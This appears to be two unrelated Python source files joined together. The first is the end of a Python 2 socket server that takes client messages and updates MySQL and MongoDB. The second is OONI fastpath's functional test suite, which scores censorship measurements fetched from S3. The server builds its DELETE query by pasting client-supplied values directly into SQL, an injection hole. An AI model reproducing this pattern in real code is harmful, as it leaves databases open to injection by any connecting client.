self.request.sendall(json.dumps(["57","-1"]))
print "add / delete Send error: %s" % e
# delete data
# 删除数据
elif jdata[0]['Agreement'] == '89':
data = jdata[0]["Content"].split(',')
sql = "delete from amount where url='"+data[0]+"' and keywords='"+data[1]+"'"
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "delete data SQL Error: %s" % e
# 删除Mongodb2数据
mt = threading.Thread(target=drop_data, args=(data[0], data[1]))
mt.start()
try:
self.request.sendall(json.dumps(["89","0"]))
except Exception, e:
self.request.sendall(json.dumps(["89","-1"]))
print "delete data Send error: %s" % e
def sigint_handler(signum, frame):
print 'catched interrupt signal!'
# get data in DB to memory
def mysql_to_memory():
sql = "select * from info"
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
for field in result:
node_map["%010d" % field[0]] = list((field[1], field[2], field[3]))
del result
cur.close()
except Exception, e:
print "mysql_to_memory SQL Error: %s" % e
if __name__ == "__main__":
signal.signal(signal.SIGINT, sigint_handler)
mysql_to_memory()
HOST, PORT = "172.18.214.188", 8888 # Server IP address and port
SocketServer.TCPServer.allow_reuse_address = True
server = SocketServer.ThreadingTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
ip, port = server.server_address
# Start a thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
print "Server loop running in thread:", server_thread.name
print "waiting for connection....."
# save data num to mysql
t = threading.Thread(target=Saveto_mysql,args=())
t.start()
server.serve_forever()
|
test_functional.py | """
Simulate feeding from the collectors or cans on S3 using a local can
"""
# Format with black -t py37 -l 110 --fast
from collections import Counter
from datetime import date, timedelta
from pathlib import Path
from unittest.mock import MagicMock
import logging
import os
import time
import ujson
import pytest # debdeps: python3-pytest
import fastpath.core as fp
import fastpath.s3feeder as s3feeder
log = logging.getLogger()
# The fixtures download cans from S3 to a local directory
#
# Use credentials from ~/.aws/config in the block:
# [ooni-data]
# aws_access_key_id = ...
# aws_secret_access_key = ...
#
# Explore bucket from CLI:
# s3cmd ls s3://ooni-data-eu-fra
BUCKET_NAME = "ooni-data"
@pytest.fixture
def cans():
"""Download interesting cans from S3 to a local directory"""
# TODO: move to the more flexible s3msmts where possible
_cans = dict(
web_conn_it="2018-05-07/20180501T071932Z-IT-AS198471-web_connectivity-20180506T090836Z_AS198471_gKqEpbg0Ny30ldGCQockbZMJSg9HhFiSizjey5e6JxSEHvzm7j-0.2.0-probe.json.lz4",
web_conn_cn="2018-05-07/20180506T014008Z-CN-AS4134-web_connectivity-20180506T014010Z_AS4134_ZpxhAVt3iqCjT5bW5CfJspbqUcfO4oZfzDVjCWAu2UuVkibFsv-0.2.0-probe.json.lz4",
web_conn_30="2019-10-30/web_connectivity.00.tar.lz4",
telegram="2019-08-29/telegram.0.tar.lz4",
whatsapp="2019-08-29/whatsapp.0.tar.lz4",
facebook_messenger="2019-08-29/facebook_messenger.0.tar.lz4",
facebook_messenger2="2019-10-29/facebook_messenger.0.tar.lz4",
# telegram="2019-08-29/20190829T105210Z-IR-AS31549-telegram-20190829T105214Z_AS31549_t32ZZ5av3B6yNruRIFhCnuT1dHTnwPk7vwIa9F0TAe064HG4tk-0.2.0-probe.json",
# fb="2019-06-27/20190627T214121Z-ET-AS24757-facebook_messenger-20190627T214126Z_AS24757_h8g9P5kTmmzyX1VyOjqcVonIbFNujm84l2leMCwC2gX3BI78fI-0.2.0-probe.json",
hhfm_2019_10_26="2019-10-26/http_header_field_manipulation.0.tar.lz4",
hhfm_2019_10_27="2019-10-27/http_header_field_manipulation.0.tar.lz4",
hhfm_2019_10_28="2019-10-28/http_header_field_manipulation.0.tar.lz4",
hhfm_2019_10_29="2019-10-29/http_header_field_manipulation.0.tar.lz4",
tor_2018_10_26="2018-10-26/vanilla_tor.0.tar.lz4",
tor_2019_10_26="2019-10-26/vanilla_tor.0.tar.lz4",
tor_2019_10_27="2019-10-27/vanilla_tor.0.tar.lz4",
tor_2019_10_28="2019-10-28/vanilla_tor.0.tar.lz4",
tor_2019_10_29="2019-10-29/vanilla_tor.0.tar.lz4",
ndt_2018_10_26="2018-10-26/ndt.0.tar.lz4",
tcp_connect_2018_10_26="2018-10-26/tcp_connect.0.tar.lz4",
dash_2019_10_26="2019-10-26/dash.0.tar.lz4",
dash_2019_10_27="2019-10-27/dash.0.tar.lz4",
dash_2019_10_28="2019-10-28/dash.0.tar.lz4",
dash_2019_10_29="2019-10-29/dash.0.tar.lz4",
meek_2019_10_26="2019-10-26/meek_fronted_requests_test.0.tar.lz4",
meek_2019_10_27="2019-10-27/meek_fronted_requests_test.0.tar.lz4",
meek_2019_10_28="2019-10-28/meek_fronted_requests_test.0.tar.lz4",
meek_2019_10_29="2019-10-29/meek_fronted_requests_test.0.tar.lz4",
big2858="2019-10-30/20191030T032301Z-BR-AS28573-web_connectivity-20191030T032303Z_AS28573_VzW6UrXrs21YjYWvlk1hyzRqnKlmKNsSntSBGqFCnzFVxVSLQf-0.2.0-probe.json.lz4",
)
for k, v in _cans.items():
_cans[k] = Path("testdata") / v
to_dload = sorted(f for f in _cans.values() if not f.is_file())
if not to_dload:
return _cans
s3 = s3feeder.create_s3_client()
for fn in to_dload:
s3fname = fn.as_posix().replace("testdata", "canned")
r = s3.list_objects_v2(Bucket=BUCKET_NAME, Prefix=s3fname)
assert r["KeyCount"] == 1, fn
assert r["KeyCount"] == 1, r
filedesc = r["Contents"][0]
size = filedesc["Size"]
print("Downloading can %s size %d MB" % (fn, size / 1024 / 1024))
os.makedirs(os.path.dirname(fn), exist_ok=True)
with open(fn, "wb") as f:
s3.download_fileobj(BUCKET_NAME, s3fname, f)
assert size == os.path.getsize(fn)
return _cans
def s3msmts(test_name, start_date=date(2018, 1, 1), end_date=date(2019, 11, 4)):
"""Fetches cans from S3 and iterates over measurements.
Detect broken dloads.
"""
s3 = s3feeder.create_s3_client()
can_date = start_date
tpl = "{}/{}.00.tar.lz4" if test_name == "web_connectivity" else "{}/{}.0.tar.lz4"
while can_date <= end_date:
# e.g. 2019-10-30/psiphon.0.tar.lz4
can_fname = tpl.format(can_date.strftime("%Y-%m-%d"), test_name)
can_date += timedelta(days=1)
can_local_file = Path("testdata") / can_fname
s3fname = "canned/" + can_fname
r = s3.list_objects_v2(Bucket=BUCKET_NAME, Prefix=s3fname)
if r["KeyCount"] != 1:
log.info("Can %s not found. Skipping." % s3fname)
continue
s3size = r["Contents"][0]["Size"]
assert s3size > 0
ready = can_local_file.is_file() and (can_local_file.stat().st_size == s3size)
if not ready:
# Download can
log.debug("Downloading can %s of size %d MB" % (can_fname, s3size / 1024 / 1024))
can_local_file.parent.mkdir(exist_ok=True)
with can_local_file.open("wb") as f:
s3.download_fileobj(BUCKET_NAME, s3fname, f)
assert s3size == can_local_file.stat().st_size
log.debug("Loading %s", s3fname)
for msm_jstr, msm, _ in s3feeder.load_multiple(can_local_file.as_posix()):
msm = msm or ujson.loads(msm_jstr)
if msm.get("report_id", None) is None:
# Missing or empty report_id
# https://github.com/ooni/probe-engine/pull/104
continue
yield can_fname, msm
def minicans(test_name, start_date: date, end_date: date, end=None):
"""Fetches minicans from S3 and iterates over measurements.
Detect broken dloads.
"""
s3 = s3feeder.create_s3_client()
day = start_date
file_cnt = 0
while day <= end_date:
tn_filter = set([test_name.replace("_", "")])
log.info(day)
li = s3feeder.list_minicans_on_s3_for_a_day(s3, day, None, tn_filter)
for s3fname, s3size in li:
# s3fname: raw/20210426/23/YE/ndt/2021042623_YE_ndt.n0.0.tar.gz
local_file = Path("testdata") / "mini" / s3fname
in_cache = local_file.is_file() and (local_file.stat().st_size == s3size)
if not in_cache:
# Download minican
log.debug("Downloading can %s of size %d KB" % (s3fname, s3size / 1024))
local_file.parent.mkdir(parents=True, exist_ok=True)
with local_file.open("wb") as f:
s3.download_fileobj(s3feeder.MC_BUCKET_NAME, s3fname, f)
assert s3size == local_file.stat().st_size
log.debug("Loading %s", s3fname)
for msm_jstr, msm, _ in s3feeder.load_multiple(local_file.as_posix()):
msm = msm or ujson.loads(msm_jstr)
yield local_file.as_posix(), msm
file_cnt += 1
if end is not None and file_cnt == end:
return
def list_cans_on_s3_for_a_day(day, filter=None, bysize=False):
s3 = s3feeder.create_s3_client()
fns = s3feeder.list_cans_on_s3_for_a_day(s3, day)
if bysize:
fns = sorted(fns, key=lambda i: i[1])
else:
fns = sorted(fns)
for fn, size in fns:
size = size / float(2 ** 20)
if filter is None or (filter in fn):
print(f"{fn:<160} {size} MB")
def disabled_test_list_cans():
"""Used for debugging"""
f = None # "psiphon"
for d in range(30, 31):
list_cans_on_s3_for_a_day("2019-10-{}".format(d), filter=f, bysize=1)
assert 0
def log_obj(o):
log.info(ujson.dumps(o, sort_keys=True, ensure_ascii=False, indent=2))
def _print_msm_node(n, depth=0):
ind = " " * depth
if isinstance(n, list):
for cnt, i in enumerate(n):
print("{}{}>".format(ind, cnt))
_print_msm_node(i, depth + 1)
elif isinstance(n, dict):
for k in sorted(n):
v = n[k]
if k == "body":
print("{}{}".format(ind, "body: ..."))
# elif k == "tor_log":
# print("{}{}".format(ind, "tor_log: ..."))
elif isinstance(v, list) or isinstance(v, dict):
print("{}{}:".format(ind, k))
_print_msm_node(n[k], depth + 1)
else:
print("{}{}: {}".format(ind, k, v))
else:
print(ind, n)
def print_msm(msm):
"""Used for debugging"""
print("--msmt--")
if "report_id" in msm:
print("https://explorer.ooni.org/measurement/{}".format(msm["report_id"]))
_print_msm_node(msm)
print("--------")
def load_can(can):
cnt = 0
for msm_jstr, msm, _ in s3feeder.load_multiple(can.as_posix()):
msm = msm or ujson.loads(msm_jstr)
if msm.get("report_id", None) is None:
# Missing or empty report_id
# https://github.com/ooni/probe-engine/pull/104
continue
yield cnt, msm
cnt += 1
# TODO mock out metrics
def setup_module(module):
fp.conf.devel = True
fp.conf.update = False
fp.conf.interact = False
fp.setup_dirs(fp.conf, Path(os.getcwd()))
fp.setup_fingerprints()
def test_telegram(cans):
can = cans["telegram"]
for msm_n, msm in load_can(can):
scores = fp.score_measurement(msm)
rid = msm["report_id"]
if rid == "20190830T002837Z_AS209_3nMvNkLIqSZMLqRiaiQylAuHxu6qpK7rVJcAA9Dv2UpcNMhPH0":
assert scores == {
"blocking_general": 1.5,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
"web_failure": None,
"accessible_endpoints": 10,
"unreachable_endpoints": 0,
"http_success_cnt": 0,
"http_failure_cnt": 0,
}, msm
elif rid == "20190829T205910Z_AS45184_0TVMQZLWjkfOdqA5b5nNF1XHrafTD4H01GnVTwvfzfiLyLc45r":
assert scores == {
"blocking_general": 1.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
"web_failure": "connection_reset",
"accessible_endpoints": 10,
"unreachable_endpoints": 0,
"http_success_cnt": 10,
"http_failure_cnt": 0,
"msg": "Telegam failure: connection_reset",
}
elif rid == "20190829T210302Z_AS197207_28cN0a47WSIxF3SZlXvceoLCSk3rSkyeg0n07pKGAi7XYyEQXM":
assert scores == {
"blocking_general": 3.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
"web_failure": "generic_timeout_error",
"accessible_endpoints": 0,
"unreachable_endpoints": 10,
"http_success_cnt": 0,
"http_failure_cnt": 10,
"msg": "Telegam failure: generic_timeout_error",
}
elif rid == "20190829T220118Z_AS16345_28eP4Hw7PQsLmb4eEPWitNvIZH8utHddaTbWZ9qFcaZudmHPfz":
assert scores == {
"blocking_general": 3.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
"web_failure": "connect_error",
"accessible_endpoints": 0,
"unreachable_endpoints": 10,
"http_success_cnt": 0,
"http_failure_cnt": 10,
"msg": "Telegam failure: connect_error",
}
def test_whatsapp(cans):
can = cans["whatsapp"]
debug = False
for msm_n, msm in load_can(can):
rid = msm["report_id"]
scores = fp.score_measurement(msm)
if rid == "20190830T002828Z_AS209_fDHPMTveZ66kGmktmW8JiGDgqAJRivgmBkZjAVRmFbH92OIlTX":
# empty test_keys -> requests
log.error(scores)
assert scores == {
"accuracy": 0.0,
"blocking_country": 0.0,
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
elif rid == "20190829T002541Z_AS29119_kyaEYabRxQW6q41n4kPH9aX5cvFEXNheCj1fguSf4js3JydUbr":
# The probe is reporting a false positive: due to the empty client headers
# it hits https://www.whatsapp.com/unsupportedbrowser
assert scores == {
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
"analysis": {
"registration_server_accessible": True,
"whatsapp_endpoints_accessible": True,
"whatsapp_web_accessible": True,
},
}, msm
# TODO: investigate
# rid == "20190829T021242Z_AS7575_4Us58f7iaQ6jshRAoGVCXggTqtuV5wLNlkp33GJJS4H8Wg7ssV":
# rid == "20190829T022402Z_AS9009_5zr5RWPkzRPEG0bhEFoWEEi6QB0arZ4qTO72b5iaKwdo6gzLEw":
# To inspect the test dataset for false positives run this:
if debug and scores["blocking_general"] > 0:
print_msm(msm)
print(scores)
raise Exception("debug")
def test_whatsapp_probe_bug(cans):
# https://github.com/ooni/probe-engine/issues/341
debug = False
for can_fn, msm in s3msmts("whatsapp", date(2020, 1, 1), date(2020, 1, 10)):
scores = fp.score_measurement(msm)
assert scores["blocking_general"] in (0.0, 1.0)
if "analysis" in scores:
assert scores["analysis"]["whatsapp_web_accessible"] in (
True,
False,
), ujson.dumps(msm, indent=1, sort_keys=True)
if debug and scores["blocking_general"] > 0:
print_msm(msm)
print(scores)
raise Exception("debug")
def test_facebook_messenger(cans):
can = cans["facebook_messenger"]
debug = False
for msm_n, msm in load_can(can):
scores = fp.score_measurement(msm)
if msm["report_id"] != "20190829T105137Z_AS6871_TJfyRlEkm6BaCfszHr06nC0c9UsWjWt8mCxRBw1jr0TeqcHTiC":
continue
if msm["report_id"] == "20190829T105137Z_AS6871_TJfyRlEkm6BaCfszHr06nC0c9UsWjWt8mCxRBw1jr0TeqcHTiC":
# not blocked
assert scores == {
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}, msm
# TODO: add more
# To inspect the test dataset for false positives run this:
elif debug and scores["blocking_general"] > 0:
print_msm(msm)
print(scores)
if debug:
raise Exception("debug")
@pytest.mark.skip(reason="Client bug in checking Facebook ASN")
def test_facebook_messenger_bug(cans):
can = cans["facebook_messenger"]
for msm_n, msm in load_can(can):
scores = fp.score_measurement(msm)
if msm["report_id"] != "20190829T000015Z_AS137_6FCvPkYvOAPUqKgO8QdllyWXTPXUbUAVV3cA43E6drE0KAe4iO":
continue
assert scores == {
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
def test_facebook_messenger_newer(cans):
can = cans["facebook_messenger2"] # from 2019-10-29
blocked_cnt = 0
debug = False
for msm_n, msm in load_can(can):
scores = fp.score_measurement(msm)
rid = msm["report_id"]
if rid == "20191029T101630Z_AS56040_bBOkNtg65fMfH0iOHiG8lMk4UmERxjfJL20ki33lKlyKjS0FkP":
# TCP really blocked
assert scores["blocking_general"] >= 1.0
continue
elif rid == "20191029T020948Z_AS50010_ZUPoP3hOdwazqZnzPurdWgfLvoMcDL1qyOHHFtEtISjNWMgkrX":
# DNS returns mostly 0.0.0.0 - but one connection succeeds
assert scores["blocking_general"] >= 1.0
continue
elif scores["blocking_general"] > 0:
blocked_cnt += 1
if debug:
print_msm(msm)
print(scores)
ratio = blocked_cnt / (msm_n + 1) * 100
assert ratio > 7.656
assert ratio < 7.657
# TODO: investigate false positives, impement workarounds
# and update tests and ratio
# https://explorer.ooni.org/measurement/20191029T213318Z_AS1257_DA3tEqiSVtfOllWDIXcw6KVJdit0TX9Tiv8y2Xganhlx2iWzzh
# https://explorer.ooni.org/measurement/20191029T213035Z_AS1257_v8XgIqXZqfZObmToEdeAkjs8R3F6ZPwMIieQJ0ewWdgyG75NiP
# empty tcp_connect:
# https://explorer.ooni.org/measurement/20191029T003015Z_AS0_DRQLG75YbuAA24UBvGilpatyq9kPUpbcVLR28JBN8EBfv8CzcT
# https://explorer.ooni.org/measurement/20191029T153938Z_AS33771_l0QJDcqNE5h0ePNxIbTKXY0Gr4LTJwl2Vg4gvPBeCvhcEisKzT
# Everything around DNS looks broken but TCP is OK
# https://explorer.ooni.org/measurement/20191029T213318Z_AS1257_DA3tEqiSVtfOllWDIXcw6KVJdit0TX9Tiv8y2Xganhlx2iWzzh
def test_score_measurement_hhfm_large(cans):
debug = False
for d in range(26, 30):
can = cans["hhfm_2019_10_{}".format(d)]
for msm_n, msm in load_can(can):
rid = msm["report_id"]
scores = fp.score_measurement(msm)
if rid == "20191028T115649Z_AS28573_eIrzDM4njwMjxBi0ODrerI5N03zM7qQoCvl4xpapTccdW0kCRg":
# Missing the "requests" field
assert scores["blocking_general"] == 0, scores
elif rid == "20191027T103751Z_AS0_A7vlqt3Ju8pmWflPxJ3E9NyrWJX47yYzQFJcSw63RBDtDm5ulf":
assert scores["blocking_general"] == 0, scores
elif rid == "20191027T143046Z_AS35540_5j5W6Q9Iz2pvVNaBtn2heKVHRDzuPtKNcLfrIhVHTmrgA7kWaT":
assert scores["blocking_general"] == 0, scores
elif rid == "20191027T192636Z_AS55430_DXpEUz925f3BS7UWyMPnXL8g8OtyDIF3FArF2z9h1ILMtrc":
assert scores["blocking_general"] == 0, scores
elif rid == "20191027T002012Z_AS45595_p2qNg0FmL4d2kIuLQXEn36MbraErPPA5i64eE1e6nLfGluHpLk":
# Client bug?
assert scores["blocking_general"] == 0, scores
elif rid == "20191027T192636Z_AS55430_DXpEUz925f3BS7UWyMPnXL8g8OtyDIF3FArF2z9h1ILMtrcbyb":
# Success - response code 200
assert scores["blocking_general"] == 0, scores
elif rid == "20191029T231841Z_AS1257_sGsZRCxZ8obOSLCVCLppeUSfu1La481EQ6E6MGkGBTgffJBs6t":
# x-tele2-subid was injected
assert scores["blocking_general"] > 0, scores
assert scores["msg"] == "1 unexpected header change"
elif rid == "20191029T071035Z_AS45629_wwVlbw7hc1jJaP5tBfzICM8S4dBhPJK29V97YzJLpthft1Zo6z":
# Proxy injecting 3 headers
assert scores["blocking_general"] > 0, scores
elif debug and scores["blocking_general"] == 1.1:
url = "https://explorer.ooni.org/measurement/{}".format(rid)
print(
msm["test_start_time"],
msm["probe_cc"],
url,
msm["test_keys"]["requests"][0].get("failure", None),
)
print_msm(msm)
print(scores)
def disabled_test_score_measurement_hhfm_stats(cans):
can = cans["hhfm_2019_10_27"]
# Distribution of request->failure values in this can
#
# connection_refused 599
# connection_refused_error 144
# connection_reset 67
# None 29
# eof_error 18
# generic_timeout_error 4
# response_never_received 4
# network_unreachable 2
# connect_error 1
# Total 868
d = Counter() # CC:failure type -> count
s = Counter() # failure type -> count
for n, msm in enumerate(load_can(can)):
rid = msm["report_id"]
# scores = fp.score_measurement(msm)
cc = msm["probe_cc"]
fm = msm["test_keys"]["requests"][0].get("failure", "*************")
if fm is None:
print_msm(msm)
url = "https://explorer.ooni.org/measurement/{}".format(rid)
print(url)
print(msm["probe_cc"], msm["test_keys"]["requests"][0].get("failure", None))
d.update(("{}:{}".format(cc, fm),))
s.update((fm,))
# for i, c in d.most_common(120):
# print(i, c)
for i, c in s.most_common(120):
print(i, c)
print("Total", sum(s.values()))
assert 0
## test_name: vanilla_tor
def test_score_vanilla_tor_2018(cans):
can = cans["tor_2018_10_26"]
timeouts = (
"20181026T003600Z_AS4134_SIts9rD3mrpgIrxrBy6NY7LHJGsBm2dbV4Q8rOHnFEQVESMqB1",
"20181026T154843Z_AS57963_GKCdB85BgIqr5frZ2Z8qOXVZgdpNGajLRXSidMeRVWg8Qvto3e",
)
for msm_n, msm in load_can(can):
scores = fp.score_measurement(msm)
rid = msm["report_id"]
if rid in timeouts:
# Real timeout
assert scores["blocking_general"] > 0
def test_score_vanilla_tor(cans):
cnt = 0
blocked_cnt = 0
total_score = 0
for d in range(26, 30):
can = cans["tor_2019_10_{}".format(d)]
for msm_n, msm in load_can(can):
scores = fp.score_measurement(msm)
rid = msm["report_id"]
cnt += 1
if rid == "20191029T012425Z_AS45194_So00Y296Ve6q1TvjOtKqsvH1ieiVF566PlcUUOw4Ia37HGPwPL":
# timeout
assert scores["blocking_general"] > 0
blocked_cnt += 1
total_score += scores["blocking_general"]
elif scores["blocking_general"] > 0:
blocked_cnt += 1
total_score += scores["blocking_general"]
# print("https://explorer.ooni.org/measurement/{}".format(rid))
# print_msm(msm)
# print(scores)
# assert 0
p = blocked_cnt * 100 / cnt
assert 0.35 < p < 0.36, p
avg = total_score / cnt
assert 0.003 < avg < 0.004
## test_name: tor
# Also see test_score_tor() in test_unit.py
def test_score_tor():
for can_fn, msm in s3msmts("tor", date(2020, 6, 1), date(2020, 6, 12)):
assert msm["test_name"] == "tor"
rid = msm["report_id"]
scores = fp.score_measurement(msm)
if rid == "20200601T000014Z_AS8339_RC9uUMBtq5AkMLx6xDtTxEciPvd171jQaYx1i3dDbhH27PemEx":
assert scores == {
"blocking_general": 0.05714285714285714,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
"extra": {"test_runtime": 31.942783471},
}
# TODO: review tests
break
# # test_name: http_requests
def test_score_http_requests():
cnt = 0
for can_fn, msm in s3msmts("http_requests", date(2016, 12, 29), date(2016, 12, 29)):
assert msm["test_name"] == "http_requests"
erid = "20161225T225955Z_AS200938_ffNnCYb1F8ih0MnomQro2ktalI7d8KnHGwQUXs0ZaqbQHTxBG1"
erid = "20161225T025526Z_AS200938_FAmaY6pHD0AoFH5DO9I9ppLP1TGnVMkrXszEUc0N7msaGcEUgt"
skip = [
"XA4JPdyzcoVgo0tWp6xzcBmxxwBGW92uR8rYdxk4843IMeA3iPgBJZ0Y5cqoIMvN",
"CkXZQnaB77inMBE161Mnh0VDPAJYRioSRzXVX8QMNdiFyfCdMMDod9X5MGmsbd20",
"CkXZQnaB77inMBE161Mnh0VDPAJYRioSRzXVX8QMNdiFyfCdMMDod9X5MGmsbd20",
]
rid = msm["report_id"]
if rid in skip:
continue
# if rid != erid:
# continue
cnt += 1
if cnt > 3000:
break
print(rid)
scores = fp.score_measurement(msm)
if rid == "20200601T000014Z_AS8339_RC9uUMBtq5AkMLx6xDtTxEciPvd171jQaYx1i3dDbhH27PemEx":
assert scores == {
"blocking_general": 0.05714285714285714,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
## test_name: web_connectivity
def test_score_web_connectivity_simple(cans):
# (rid, inp) -> scores: exact match on scores
expected = {
(
"20191104T000516Z_AS52871_uFya6RnctQPrBVEdxE9uUpOxia9frBkNXkP9ZNmhQPEFoKqJ0l",
"https://100ko.wordpress.com/",
): {
# unknown_failure
"scores": {
"accuracy": 0.0,
"analysis": {"blocking_type": "http-failure"},
"blocking_country": 0.0,
"blocking_general": 1.0,
"blocking_global": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
},
(
"20191104T032906Z_AS8402_fY9b9V3jLtosTMNJbub1xNvuKBpZwPXTp7df9NLw6Sp4QOnXIz",
"http://www.ohchr.org/",
): {
"scores": {
"blocking_country": 0.0,
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
},
(
"20191101T015523Z_AS0_muvGSfWmgRobU77ZL980XGRTyJ80HC0ubQ5YaPaYiotxiXL6po",
"http://www.newnownext.com/franchise/the-backlot/",
): {
"scores": {
"analysis": {"blocking_type": "http-diff"},
"blocking_country": 0.0,
"blocking_general": 1.0,
"blocking_global": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
},
(
"20191101T071829Z_AS0_sq5lk0Y4jhCECrgk2pAgMWlgOczBLDkIb2OE9QnHf1OEOmwOBz",
"http://www.lingeriebowl.com",
): {
"scores": {
"analysis": {"blocking_type": "dns"},
"blocking_country": 0.0,
"blocking_general": 1.0,
"blocking_global": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
},
(
"20191101T071829Z_AS0_sq5lk0Y4jhCECrgk2pAgMWlgOczBLDkIb2OE9QnHf1OEOmwOBz",
"http://www.pravda.ru",
): {
# In this msmt title_match is false due to the probe following a redirect.
# The probe uses:
# (body_length_match or headers_match or title_match) and (status_code_match != false)
"scores": {
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
},
}
for can_fn, msm in s3msmts("web_connectivity", start_date=date(2019, 11, 1)):
rid = msm["report_id"]
inp = msm["input"]
scores = fp.score_measurement(msm)
if (rid, inp) not in expected:
# log.warning(f"https://explorer.ooni.org/measurement/{rid}?input={inp}")
# log.warning((rid, inp, scores))
continue
exp = expected.pop((rid, inp))
if "scores" in exp:
assert scores == exp["scores"]
assert len(expected) == 0, "Not all expected measurements were tested"
@pytest.mark.skip(reason="FIXME")
def test_score_web_connectivity_with_workers(cans, tmp_path):
# Run worker processes on a big can
# Mock out database interactions but write output json
# files
can = cans["big2858"]
expected_cnt = 2858
outdir = tmp_path
assert tuple(tmp_path.glob("*")) == ()
import fastpath.portable_queue as queue
import multiprocessing as mp
fp.db.setup = MagicMock()
fp.db.trim_old_measurements = MagicMock()
fp.db._autocommit_conn = MagicMock()
m1 = MagicMock(name="mycursor")
mctx = MagicMock(name="mock_ctx")
# By mocking SQL execute() each workers logs its queries in a dedicated
# file. We then collect the files to inspect if all inputs were processed.
def mock_execute(query, *a, **kw):
try:
pid = os.getpid()
wl = outdir / f"{pid}.wlog"
if wl.is_file():
log.debug("Loading %s", wl)
d = ujson.load(wl.open())
else:
d = dict(inserted_tids=[], other_queries=[])
if "INSERT INTO fastpath" in query:
query_args = a[0]
assert len(query_args) == 11
tid = query_args[0]
d["inserted_tids"].append(tid)
elif "SELECT pg_notify('fastpath" in query:
pass
else:
d["other_queries"].append(query)
ujson.dump(d, wl.open("w"))
except Exception as e:
log.exception(e)
mctx.execute = mock_execute
m1.__enter__ = MagicMock(name="myenter", return_value=mctx)
fp.db._autocommit_conn.cursor = MagicMock(name="curgen", return_value=m1)
workers = [mp.Process(target=fp.msm_processor, args=(queue,)) for n in range(4)]
[t.start() for t in workers]
for w in workers:
wl = outdir / f"{w.pid}.wlog"
if wl.is_file():
wl.unlink()
assert w.is_alive()
for msm_n, msm in load_can(can):
queue.put((None, msm))
assert msm_n == expected_cnt - 1
for w in workers:
# each worker will receive one terminator message and quit
queue.put(None)
while any(w.is_alive() for w in workers):
log.debug("waiting...")
time.sleep(0.1)
assert len(tuple(tmp_path.glob("*"))) == expected_cnt, tmp_path
all_inserted_tids = set()
for w in workers:
wl = outdir / f"{w.pid}.wlog"
assert wl.is_file(), "The worker did not create a logfile"
d = ujson.load(wl.open())
wl.unlink()
s = set(d["inserted_tids"])
assert len(s) == len(d["inserted_tids"]), "Duplicate INSERT INTO"
dup = all_inserted_tids & s
assert len(dup) == 0, f"{dup} inserted by different workers"
all_inserted_tids = all_inserted_tids | s
assert len(all_inserted_tids) == expected_cnt
def test_score_ndt(cans):
can = cans["ndt_2018_10_26"]
for msm_n, msm in load_can(can):
scores = fp.score_measurement(msm)
assert scores == {} # no scoring yet
def test_score_tcp_connect(cans):
# tcp_connect msmts are identified by (report_id / input)
debug = 0
can = cans["tcp_connect_2018_10_26"]
for msm_n, msm in load_can(can):
rid = msm["report_id"]
inp = msm["input"]
scores = fp.score_measurement(msm)
if rid == "20181026T000102Z_AS51570_2EslrKCu0NhDQiCIheVDvilWchWShK6GTC7Go6i31VQrGfXRLM":
if inp == "109.105.109.165:22":
# generic_timeout_error
assert scores["blocking_general"] == 0.8
elif inp == "obfs4 83.212.101.3:50000":
# connection_refused_error
assert scores["blocking_general"] == 0.8
elif inp == "178.209.52.110:22":
# connect_error
assert scores["blocking_general"] == 0.8
elif inp == "obfs4 178.209.52.110:443":
# tcp_timed_out_error
assert scores["blocking_general"] == 0.8
elif debug and scores["blocking_general"] > 0.7:
print("https://explorer.ooni.org/measurement/{}".format(rid))
print_msm(msm)
print(scores)
assert 0
def test_score_dash(cans):
# rid -> blocking_general, accuracy
expected = {
"20191026T015105Z_AS4837_7vwBtbVmZZqwZhdTHnqHan0Nwa7bi7TeJ789htG3RB91C3eyU1": (
0.1,
0.0,
"blocking_general",
),
"20191026T022317Z_AS17380_ZJGnXdvHl4j1M4xTeskrGhC8SW1KT4buJEjxCsTagCGO2NZeAD": (
0.1,
0.0,
"json_parse_error",
),
"20191026T032159Z_AS20057_xLjBSrTyZjOn6C7pa5BPyUxyBhzWHbSooKQjUY9zcWADnkakIR": (
0.1,
0.0,
"eof_error",
),
"20191026T051350Z_AS44244_9yjPG1UbgIjtAFg9LiTUxVhq7hGuG3tG4yMnvt6gRJTaFdQme6": (
0.1,
0.0,
"json_processing_error",
),
"20191026T071332Z_AS7713_caK9GNyp9ZhN7zL9cg2dg0zGhs44CwHmxZtOyK7B6rBKRaGGMF": (
0.1,
0.0,
"http_request_failed",
),
"20191026T093003Z_AS4837_yHZ0f8Oxyhus9vBKAUa0tA2XMSObIO0frShG6YBieBzY9RiSBg": (
0.1,
0.0,
"connect_error",
),
